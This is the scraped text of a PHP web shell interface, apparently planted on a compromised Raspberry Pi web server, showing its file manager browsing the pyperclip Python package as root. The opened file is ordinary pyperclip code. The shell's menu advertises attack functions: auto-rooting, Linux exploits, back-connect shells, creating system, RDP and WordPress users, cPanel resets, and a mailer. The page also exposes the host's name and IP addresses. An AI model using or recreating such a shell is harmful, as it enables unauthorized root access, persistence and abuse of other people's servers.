Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
lib /
python3.7 /
dist-packages /
pyperclip /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-sr-x
__init__.py
22.8
KB
-rw-r--r--
__main__.py
748
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __main__.py
import pyperclip import sys if len(sys.argv) > 1 and sys.argv[1] in ('-c', '--copy'): if len(sys.argv) > 2: pyperclip.copy(sys.argv[2]) else: pyperclip.copy(sys.stdin.read()) elif len(sys.argv) > 1 and sys.argv[1] in ('-p', '--paste'): sys.stdout.write(pyperclip.paste()) else: print('Usage: python -m pyperclip [-c | --copy] [text_to_copy] | [-p | --paste]') print() print('If a text_to_copy argument is provided, it is copied to the') print('clipboard. Otherwise, the stdin stream is copied to the') print('clipboard. (If reading this in from the keyboard, press') print('CTRL-Z on Windows or CTRL-D on Linux/macOS to stop.') print('When pasting, the clipboard will be written to stdout.')
Close